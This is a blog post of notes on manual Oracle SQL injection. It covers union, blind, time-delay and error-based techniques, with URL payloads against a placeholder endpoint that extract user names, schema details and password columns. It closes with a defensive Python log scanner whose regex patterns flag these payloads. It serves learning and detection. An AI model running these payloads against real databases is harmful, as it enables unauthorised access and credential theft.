Oracle database injection

Preface

In past penetration tests, whenever I ran into Oracle injection I always used tools to run it. After reading some related articles over the last few days, I realised my knowledge of manual Oracle injection was still lacking, so this post is a brief set of notes.

Roles

connect -- connect role, the basic role
resource -- developer role
dba -- super administrator role

Commonly used commands during injection

Query the current user name
select user from dual;
Get the current database name
select * from global_name;
Query version information
select banner from v$version;
Get the current user's privileges
select * from session_privs;
Get all tables (with their owners) visible to the current user
select distinct owner,table_name from all_tables;
Get the columns of a given table (note that table_name must be all upper case)
select column_name from all_tab_columns where table_name='USERS';

Commonly used functions and concatenation operators during injection

dual is a virtual table in Oracle that any user can read; it is commonly used in select statements that have no target table.

String concatenation
select '123'||'456' from dual;
Pagination (equivalent of limit)
select * from users where rownum=1;
select * from users where rownum<2;
select * from users where rownum<=1;
Comment markers
--
-- -
-- followed by a space
/**/
Equivalent of MySQL's group_concat (joins multiple column_name values using ~ as the separator)
select listagg(column_name,'~') within group (order by column_name) from user_tab_columns;

Union query

Format
select * from users where id=2 union select null,null,null from dual;

Get table names
select * from users where id=2 union select null,null,(select listagg(table_name,'~') within group(order by 1) from all_tables where owner='SQLI') from dual;

Get the column names of a given table
select * from users where id=2 union select null,null,(select listagg(column_name,':') within group(order by 1) from all_tab_columns where table_name='USERS') from dual;

Get the contents of given columns
select * from users where id=2 union select null,null,(select listagg(uname||'&'||pwd,':') within group(order by 1) from users where rownum=1) from dual;

Blind injection

select * from users where id=1 and 1=(select decode(user,'SQLI',1) from dual);
select * from users where id=1 and 'S'=(select substr(user,1,1)from dual);

Time delay
select dbms_pipe.receive_message('aaa',3) from dual;
select dbms_pipe.receive_message('aaa',(decode((select user from dual),'SQLI',3))) from dual;

General procedure for union-based injection

Check whether an injection point exists
http://xxx/x.php?id=1'
http://xxx/x.php?id=1' --+
http://xxx/x.php?id=1 and 1=1
http://xxx/x.php?id=1 and 1=2
Determine the number of columns
http://xxx/x.php?id=1 order by 1
http://xxx/x.php?id=1 order by 2
...
http://xxx/x.php?id=1 order by n
Find the column positions that are echoed back
http://xxx/x.php?id=1 and 1=2 union select null,null,null,null
Replace each null with a typed value such as '1' or 2 to determine the column type and the echo position

Then place the query in an echoed position

Determine the user name
http://xxx/x.php?id=1 and 1=2 union select null,user,null,null
Determine the database version
http://xxx/x.php?id=1 and 1=2 union select null,(select banner from v$version),null,null from all_users
Determine the user's privileges
http://xxx/x.php?id=1 and 1=2 union select null,(select privilege from session_privs where rownum=1),null,null
Get the current database
http://xxx/x.php?id=1 and 1=2 union select null,global_name,null,null from global_name
http://xxx/x.php?id=1 and 1=2 union select null,(select global_name from global_name),null,null
Get table names
http://xxx/x.php?id=1 and 1=2 union select null,(select table_name from user_tables where rownum=1),null,null from dual
Get column names
http://xxx/x.php?id=1 and 1=2 union select null,(select column_name from user_tab_columns where table_name='USERS' and rownum=1),null,null from dual
Get data
http://xxx/x.php?id=1 and 1=2 union select null,(select name from USERS where rownum=1),null,null from dual

General procedure for error-based injection

Get the user name
id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual)) --
Get the tables owned by the current user
id=1 and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1)) --
Query column names
id=1 and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where table_name='USERS' and rownum=1)) --
Query data
id=1 and 1=ctxsys.drithsx.sn(1,(select username password from USERS where rownum=1)) --

By the same approach, several other error-raising functions can be used for these queries.
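From the defender's side, the payloads above share Oracle-specific tokens (`from dual`, `v$version`, `union select null`, `ctxsys.drithsx.sn`, `dbms_pipe.receive_message`, `listagg`) that are easy to flag in web server logs. The following is an added example, not code from the original post: a small Python scanner that URL-decodes the query string of each access-log line and labels which of this page's techniques it resembles. The `/x.php` endpoint and the log lines are constructed sample data.

```python
import re
from urllib.parse import unquote_plus

# Signatures drawn from the Oracle payloads on this page. Matching is done on the
# URL-decoded, lower-cased query string so "+" and "%xx" encodings are handled alike.
ORACLE_SQLI_PATTERNS = [
    ("union-null-probe",   re.compile(r"union\s+select\s+null")),
    ("dual-table",         re.compile(r"\bfrom\s+dual\b")),
    ("version-probe",      re.compile(r"\bv\$version\b")),
    ("privilege-probe",    re.compile(r"\bsession_privs\b")),
    ("schema-enumeration", re.compile(r"\b(all_tables|user_tables|all_tab_columns|user_tab_columns)\b")),
    ("error-based",        re.compile(r"ctxsys\.drithsx\.sn\s*\(")),
    ("time-based",         re.compile(r"dbms_pipe\.receive_message\s*\(")),
    ("listagg-concat",     re.compile(r"\blistagg\s*\(")),
    ("order-by-probe",     re.compile(r"\border\s+by\s+\d+")),
]

def classify_request(raw_query):
    """Return the labels of every Oracle-injection signature found in one query string."""
    decoded = unquote_plus(raw_query).lower()
    return [label for label, rx in ORACLE_SQLI_PATTERNS if rx.search(decoded)]

def scan_access_log(lines):
    """Yield (client_ip, labels) for each combined-format log line whose query string matches."""
    req_rx = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')
    for line in lines:
        m = req_rx.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        ip, target = m.groups()
        query = target.partition("?")[2]  # everything after the first '?'
        labels = classify_request(query)
        if labels:
            yield ip, labels

# Constructed sample log lines (hypothetical host, not from the original post).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /x.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /x.php?id=1+order+by+3 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /x.php?id=1+and+1%3D2+union+select+null%2C(select+banner+from+v%24version)%2Cnull%2Cnull+from+dual HTTP/1.1" 200 700',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /x.php?id=1+and+1%3Dctxsys.drithsx.sn(1%2C(select+user+from+dual))+-- HTTP/1.1" 500 300',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /x.php?id=1+and+1%3D(select+dbms_pipe.receive_message(%27a%27%2C3)+from+dual) HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, labels in scan_access_log(SAMPLE_LOG):
        print(ip, ",".join(labels))
```

A single `order by N` hit is a weak signal on its own; correlating several labels from one client within a short window, as the sample output shows for 10.0.0.9, is the useful alert condition.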

References

https://www.chabug.org/web/1827.html

https://www.jianshu.com/p/5ce219032823


Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting!